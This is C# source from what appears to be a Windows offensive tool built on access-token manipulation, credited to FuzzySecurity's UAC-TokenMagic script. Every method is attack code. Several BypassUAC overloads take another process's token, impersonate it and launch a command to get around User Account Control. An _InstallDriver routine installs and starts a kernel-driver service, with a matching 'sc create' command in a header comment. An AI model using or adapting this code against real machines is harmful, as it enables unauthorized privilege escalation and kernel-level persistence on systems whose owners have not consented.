        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Launches <paramref name="command"/> with an already-obtained token handle.
        /// The handle is stored in phNewToken, adjusted with SetTokenInformation(),
        /// impersonated with ImpersonateUser(), and then passed to
        /// CreateProcess.CreateProcessWithLogonW. Impersonation is reverted before
        /// returning whenever SetTokenInformation() succeeded, on both outcomes.
        /// What the two helpers change on the token is not visible here.
        /// </summary>
        /// <param name="htoken">Token handle; assigned to the phNewToken field unchanged.</param>
        /// <param name="command">Image name, optionally followed by space-separated arguments.</param>
        /// <returns>true only when CreateProcessWithLogonW reports success; false otherwise.</returns>
        public Boolean BypassUAC(IntPtr htoken, String command)
        {
            phNewToken = htoken;

            // Nothing was set up, so there is nothing to revert.
            if (!SetTokenInformation())
            {
                return false;
            }

            Boolean launched = false;
            if (ImpersonateUser())
            {
                // First whitespace-delimited item is the image; the remainder is the argument string.
                String arguments = String.Empty;
                if (command.IndexOf(' ') >= 0)
                {
                    String[] parts = command.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries);
                    command   = parts.First();
                    arguments = String.Join(" ", parts.Skip(1));
                }

                launched = CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments);
            }

            // Single revert point for the success and the failure path; its result is not inspected.
            advapi32.RevertToSelf();
            return launched;
        }
 ////////////////////////////////////////////////////////////////////////////////
 //https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
 ////////////////////////////////////////////////////////////////////////////////
 /// <summary>
 /// Fire-and-forget variant: prints the calling identity, then runs
 /// GetPrimaryToken, SetTokenInformation, ImpersonateUser and
 /// CreateProcess.CreateProcessWithLogonW back to back with an empty argument string.
 /// Unlike the Boolean overloads, no helper result is checked and RevertToSelf is
 /// not called, so whatever ImpersonateUser() set up is presumably left in place.
 /// </summary>
 /// <param name="processId">Process whose primary token is requested (passed as UInt32).</param>
 /// <param name="command">Command line handed to CreateProcessWithLogonW unchanged.</param>
 public void BypassUAC(Int32 processId, String command)
 {
     String caller = WindowsIdentity.GetCurrent().Name;
     Console.WriteLine(" [+] Running as: " + caller);

     UInt32 targetPid = (UInt32)processId;
     GetPrimaryToken(targetPid);
     SetTokenInformation();
     ImpersonateUser();

     // This overload never splits arguments off the command.
     CreateProcess.CreateProcessWithLogonW(phNewToken, command, "");
 }
 ////////////////////////////////////////////////////////////////////////////////
 //https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
 ////////////////////////////////////////////////////////////////////////////////
 /// <summary>
 /// Obtains the primary token of <paramref name="processId"/>, adjusts and
 /// impersonates it, and starts <paramref name="command"/> through
 /// CreateProcess.CreateProcessWithLogonW with an empty argument string.
 /// RevertToSelf is called before returning whenever SetTokenInformation() succeeded.
 /// </summary>
 /// <param name="processId">Process whose primary token is requested (passed as UInt32).</param>
 /// <param name="command">Command line handed to CreateProcessWithLogonW unchanged.</param>
 /// <returns>true only when CreateProcessWithLogonW reports success; false otherwise.</returns>
 public Boolean BypassUAC(Int32 processId, String command)
 {
     // Early exits: no impersonation has happened yet, so nothing to revert.
     if (!GetPrimaryToken((UInt32)processId))
     {
         return false;
     }
     if (!SetTokenInformation())
     {
         return false;
     }

     // Short-circuit keeps the original order: no process creation unless impersonation succeeded.
     Boolean launched = ImpersonateUser()
         && CreateProcess.CreateProcessWithLogonW(phNewToken, command, "");

     // Single revert point for the success and the failure path.
     advapi32.RevertToSelf();
     return launched;
 }
        ////////////////////////////////////////////////////////////////////////////////
        //https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
        ////////////////////////////////////////////////////////////////////////////////
        /// <summary>
        /// Obtains the primary token of <paramref name="processId"/>, adjusts and
        /// impersonates it, splits <paramref name="command"/> into image and
        /// arguments with FindExe, and starts it through
        /// CreateProcess.CreateProcessWithLogonW. RevertToSelf is called before
        /// returning whenever SetTokenInformation() succeeded.
        /// </summary>
        /// <param name="processId">Process whose primary token is requested (passed as UInt32).</param>
        /// <param name="command">Command line; FindExe rewrites it to the image path and yields the arguments.</param>
        /// <returns>true only when CreateProcessWithLogonW reports success; false otherwise.</returns>
        public Boolean BypassUAC(Int32 processId, String command)
        {
            // Short-circuit preserves the order: the token is adjusted only after it was obtained.
            if (!GetPrimaryToken((UInt32)processId) || !SetTokenInformation())
            {
                return false;
            }

            Boolean launched = false;
            if (ImpersonateUser())
            {
                String arguments;
                FindExe(ref command, out arguments);
                launched = CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments);
            }

            // Single revert point for the success and the failure path.
            advapi32.RevertToSelf();
            return launched;
        }
        ////////////////////////////////////////////////////////////////////////////////
        // sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
        ////////////////////////////////////////////////////////////////////////////////
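        /// <summary>
        /// Installs (when not already present) and starts a kernel-driver service
        /// on the local machine, the programmatic form of the sc command in the
        /// header above. Three optional keys are read from <paramref name="cLP"/>:
        /// ServiceName (default "TokenDriver"), Path (the driver binary) and Force
        /// (its mere presence selects overwriting an existing service).
        /// </summary>
        /// <param name="cLP">Parsed command line; values are fetched with GetData.</param>
        /// <remarks>
        /// Every failure is reported on the console and ends the method; nothing is
        /// returned to the caller. Installing a driver service is a high-privilege,
        /// well-audited action: the Service Control Manager records the new service
        /// in the System event log (event 7045) and the load is subject to driver
        /// signature enforcement, which is where defenders should expect to see it.
        /// </remarks>
        private static void _InstallDriver(CommandLineParsing cLP)
        {
            string serviceName = "TokenDriver";
            string sn;
            if (cLP.GetData("ServiceName", out sn))
            {
                serviceName = sn;
            }

            string path = string.Empty;
            string p;
            if (cLP.GetData("Path", out p))
            {
                path = p;
            }

            // Presence of the key alone selects overwrite; its value is ignored.
            object f;
            bool overwrite = cLP.GetData("Force", out f);

            Console.WriteLine("[*] Service Name: " + serviceName);
            Console.WriteLine("[*] Service Path: " + path);

            PSExec psexec = new PSExec(serviceName);
            if (!psexec.Connect("."))
            {
                Console.WriteLine("[-] Unable to connect to service controller");
                return;
            }

            // Resolve the binary: take it as a path first, otherwise search with FindFilePath.
            string filename;
            try
            {
                filename = Path.GetFullPath(path);
            }
            catch (ArgumentException)
            {
                filename = CreateProcess.FindFilePath(path);
                if (string.IsNullOrEmpty(filename))
                {
                    Console.WriteLine("[-] Unable to locate service binary");
                    return;
                }
            }
            catch (Exception ex)
            {
                // Previously a silent return; keep the best-effort exit but report the reason.
                Console.WriteLine("[-] Unable to resolve service path: " + ex.Message);
                return;
            }

            Console.WriteLine("[*] Full Path: " + filename);

            if (!File.Exists(filename))
            {
                // Bug fix: the placeholder was printed literally because no argument was supplied.
                Console.WriteLine("[-] Unable to find service binary: {0}", filename);
                return;
            }

            // Open the existing service, or create the driver service and open it.
            if (!psexec.Open())
            {
                if (!psexec.CreateDriver(filename, overwrite) || !psexec.Open())
                {
                    return;
                }
            }

            if (!psexec.Start())
            {
                return;
            }
        }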